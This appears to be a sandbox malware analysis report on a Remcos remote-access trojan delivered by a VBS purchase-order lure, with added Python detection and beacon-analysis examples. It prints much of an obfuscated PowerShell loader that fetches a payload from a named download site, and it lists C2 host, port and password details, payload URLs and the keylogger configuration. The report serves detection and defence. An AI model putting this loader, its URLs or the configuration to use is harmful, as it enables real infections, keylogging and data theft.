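# PIDs and images follow the tree; the WMIC image path and the final benign
# control event are assumptions.
EVENTS = [
    {"EventID": 1, "ProcessId": 6416, "ParentProcessId": 1028,
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs"'},
    {"EventID": 1, "ProcessId": 5264, "ParentProcessId": 6416,
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic diskdrive get caption,serialnumber"},
    {"EventID": 1, "ProcessId": 576, "ParentProcessId": 6416,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": PS_CMDLINE},
    {"EventID": 1, "ProcessId": 7108, "ParentProcessId": None,   # parent not shown in the report
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": PS_CMDLINE.replace("System32", "SysWOW64", 1)},
    {"EventID": 1, "ProcessId": 6764, "ParentProcessId": 7108,
     "Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\msiexec.exe"'},
    {"EventID": 3, "ProcessId": 6764, "Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "Initiated": True, "DestinationIp": "200.6.118.162", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 9001, "ParentProcessId": 1028,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return (rule, pid) pairs; the rules mirror the report's Sigma and behaviour signatures."""
    procs = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    hits = []
    for e in events:
        pid, img = e["ProcessId"], basename(e["Image"])
        if e["EventID"] == 1:
            parent = procs.get(e["ParentProcessId"])
            pimg = basename(parent["Image"]) if parent else ""
            cmd = e["CommandLine"]
            if pimg in SCRIPT_HOSTS and img in SHELLS:
                hits.append(("script_host_spawns_shell", pid))             # WScript/CScript dropper
            if pimg in SCRIPT_HOSTS and img == "wmic.exe" and "diskdrive" in cmd.lower():
                hits.append(("wmi_diskdrive_query_from_script_host", pid))  # Win32_DiskDrive VM check
            if img in SHELLS and len(cmd) > LONG_CMDLINE:
                hits.append(("very_long_command_line", pid))
            if img in SHELLS and DYNAMIC_INVOKE.search(cmd):
                hits.append(("dynamic_command_invocation", pid))
        elif e["EventID"] == 3 and e.get("Initiated"):
            if img == "msiexec.exe" and ip_address(e["DestinationIp"]).is_global:
                hits.append(("msiexec_outbound_connection", pid))          # Msiexec Initiated Connection
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:40} pid={pid}")
```

The parent lookup is done by PID within the same event batch, so a child whose parent is missing (the 32-bit PowerShell here, whose parent the report does not show) still trips the command-line rules but not the chain rule; in production telemetry the parent image usually comes with the event and the lookup is unnecessary. The msiexec rule deliberately requires an initiated connection to a globally routable address, since msiexec.exe legitimately talks to internal deployment servers.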

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6764, TargetFilename: C:\ProgramData\remcos\logs.dat
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T04:01:51.767234+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49544 | 185.236.203.101 | 50396 | TCP
2024-10-31T04:02:54.472407+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49428 | 185.236.203.101 | 50396 | TCP
2024-10-31T04:03:04.014344+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49474 | 185.236.203.101 | 50396 | TCP
2024-10-31T04:03:13.513777+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49522 | 185.236.203.101 | 50396 | TCP
2024-10-31T04:03:23.019864+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49538 | 185.236.203.101 | 50396 | TCP
2024-10-31T04:03:32.520591+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49540 | 185.236.203.101 | 50396 | TCP
2024-10-31T04:03:42.021521+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49541 | 185.236.203.101 | 50396 | TCP
2024-10-31T04:03:51.521790+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49542 | 185.236.203.101 | 50396 | TCP
2024-10-31T04:04:02.145928+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49543 | 185.236.203.101 | 50396 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T04:02:42.296020+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49401 | 200.6.118.162 | 443 | TCP


AV Detection

Source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["fumecexpsales1international.duckdns.org:50396:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T15VJD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Yara match | File source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.1% probability
Source: unknown | HTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49401 version: TLS 1.2
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdbui source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49428 -> 185.236.203.101:50396
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49474 -> 185.236.203.101:50396
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49543 -> 185.236.203.101:50396
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49541 -> 185.236.203.101:50396
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49538 -> 185.236.203.101:50396
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49522 -> 185.236.203.101:50396
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49540 -> 185.236.203.101:50396
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49542 -> 185.236.203.101:50396
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49544 -> 185.236.203.101:50396
Source: Malware configuration extractor | URLs: fumecexpsales1international.duckdns.org
Source: global traffic | TCP traffic: 185.236.203.101 ports 0,3,50396,5,6,9
Source: unknown | DNS query: name: fumecexpsales1international.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.5:49428 -> 185.236.203.101:50396
Source: Joe Sandbox View | IP Address: 185.236.203.101
Source: Joe Sandbox View | IP Address: 200.6.118.162
Source: Joe Sandbox View | ASN Name: M247GB
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49401 -> 200.6.118.162:443
Source: global traffic | HTTP traffic detected:
  GET /bin/Interplea.snp HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: torresvmackenna.cl
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /bin/iNJULFUvfUQqzNBELgyUIZY67.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: torresvmackenna.cl
  Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported four times)
Source: global traffic | DNS traffic detected: DNS query: torresvmackenna.cl
Source: global traffic | DNS traffic detected: DNS query: fumecexpsales1international.duckdns.org
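The extracted configuration gives the C2 as fumecexpsales1international.duckdns.org:50396 with password "1" and a 1-second connect interval, and the Suricata JA3 alerts above show the sandbox reconnecting to 185.236.203.101:50396 from nine different ephemeral ports in just over two minutes. The following added Python example (not from the report) parses the Host:Port:Password entry, flags the dynamic-DNS host, ties the alerts to the configured port and scores the regularity of the reconnects from the alert timestamps. The alert rows are transcribed from the Suricata alert table in this report; the dynamic-DNS suffix list is an illustrative assumption and the 10% tolerance is an arbitrary choice. One caveat on the "connects to many ports of the same IP" signature: the only line supporting it lists ports 0,3,50396,5,6,9, and the single-digit entries are the digits of 50396; every actual flow to 185.236.203.101 in this report uses port 50396, which the example confirms.

```python
from datetime import datetime
from statistics import median

# Transcribed from the Suricata alert table in this report:
# (timestamp, SID, severity, source port, destination IP, destination port).
# The source IP is the sandbox host 192.168.2.5 in every row.
ALERTS = [
    ("2024-10-31T04:01:51.767234+0100", 2036594, 1, 49544, "185.236.203.101", 50396),
    ("2024-10-31T04:02:54.472407+0100", 2036594, 1, 49428, "185.236.203.101", 50396),
    ("2024-10-31T04:03:04.014344+0100", 2036594, 1, 49474, "185.236.203.101", 50396),
    ("2024-10-31T04:03:13.513777+0100", 2036594, 1, 49522, "185.236.203.101", 50396),
    ("2024-10-31T04:03:23.019864+0100", 2036594, 1, 49538, "185.236.203.101", 50396),
    ("2024-10-31T04:03:32.520591+0100", 2036594, 1, 49540, "185.236.203.101", 50396),
    ("2024-10-31T04:03:42.021521+0100", 2036594, 1, 49541, "185.236.203.101", 50396),
    ("2024-10-31T04:03:51.521790+0100", 2036594, 1, 49542, "185.236.203.101", 50396),
    ("2024-10-31T04:04:02.145928+0100", 2036594, 1, 49543, "185.236.203.101", 50396),
    ("2024-10-31T04:02:42.296020+0100", 2803270, 2, 49401, "200.6.118.162", 443),
]
REMCOS_C2 = "fumecexpsales1international.duckdns.org:50396:1"  # "Host:Port:Password" from the config
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net")  # illustrative list, not exhaustive


def parse_c2(entry: str) -> tuple:
    """Split a Remcos Host:Port:Password entry.  Splitting from the right on
    the last two colons keeps a host that itself contains colons intact."""
    host, port, password = entry.rsplit(":", 2)
    return host, int(port), password


def is_dynamic_dns(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES)


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def beacon_stats(alerts, tolerance: float = 0.10):
    """Median gap between successive alerts and the share of gaps within
    +/- tolerance of it: a crude regularity score for reconnect behaviour."""
    times = sorted(parse_ts(a[0]) for a in alerts)
    gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
    med = median(gaps)
    regular = sum(1 for g in gaps if abs(g - med) <= tolerance * med) / len(gaps)
    return med, regular


def summarize(alerts=ALERTS, c2_entry=REMCOS_C2) -> dict:
    host, port, _password = parse_c2(c2_entry)
    sessions = [a for a in alerts if a[5] == port]      # flows to the configured C2 port
    c2_ips = sorted({a[4] for a in sessions})
    med, regular = beacon_stats(sessions)
    return {
        "c2_host": host,
        "c2_port": port,
        "dynamic_dns": is_dynamic_dns(host),
        "c2_ips": c2_ips,
        "sessions": len(sessions),
        "distinct_source_ports": len({a[3] for a in sessions}),
        "median_gap_s": round(med, 2),
        "regular_share": regular,
        # every destination port seen on each C2 IP, across all alerts
        "ports_per_c2_ip": {ip: sorted({a[5] for a in alerts if a[4] == ip}) for ip in c2_ips},
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

Six of the eight gaps fall within 10% of the roughly 9.5-second median; the two outliers are the first interval, before the stage had unpacked, and the last one. A fresh source port per alert is what a short reconnect interval looks like from the network side, and it is also why a JA3 rule (which fires per TLS handshake) produces one alert per session here rather than one per host.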
Source: wscript.exe, 00000000.00000002.2066149580.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063357887.000001FB2D8DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2063357887.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2066149580.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2046230842.000001FB2F914000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046040317.000001FB2F914000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabB
Source: wscript.exe, 00000000.00000002.2066149580.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063357887.000001FB2D8DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
Source: wscript.exe, 00000000.00000003.2046141045.000001FB2D95F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045915330.000001FB2D937000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?97dbf7f69e
Source: powershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CC96C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://torresvmackenna.cl
Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000004.00000002.2178361107.000001A2CB8C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000004.00000002.2178361107.000001A2CB16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178361107.000001A2CC235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl
                Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAF55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl/bin/Interplea.snpP
                Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl/bin/Interplea.snpXR#l
                Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3318420057.0000000000CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin
                Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin1
                Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.binb
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49401
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49401 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownHTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49401 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\SysWOW64\msiexec.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe

                E-Banking Fraud

                Source: Yara match | File source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                Source: amsi32_7108.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 576, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. 
Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
                Source: C:\Windows\SysWOW64\msiexec.exe | Process Stats: CPU usage > 49%
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848E8A726
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848E8B8E2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04ADE918
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04ADF1E8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04ADE5D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_078DCDF0
                Source: nOrden_de_Compra___0001245.vbs | Initial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4378
                Source: unknown | Process created: Commandline size = 4378
                Source: amsi32_7108.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 576, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@11/10@4/2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Trkfugl.Chr
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3200:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-T15VJD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hypfsfn3.qtz.ps1
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=576
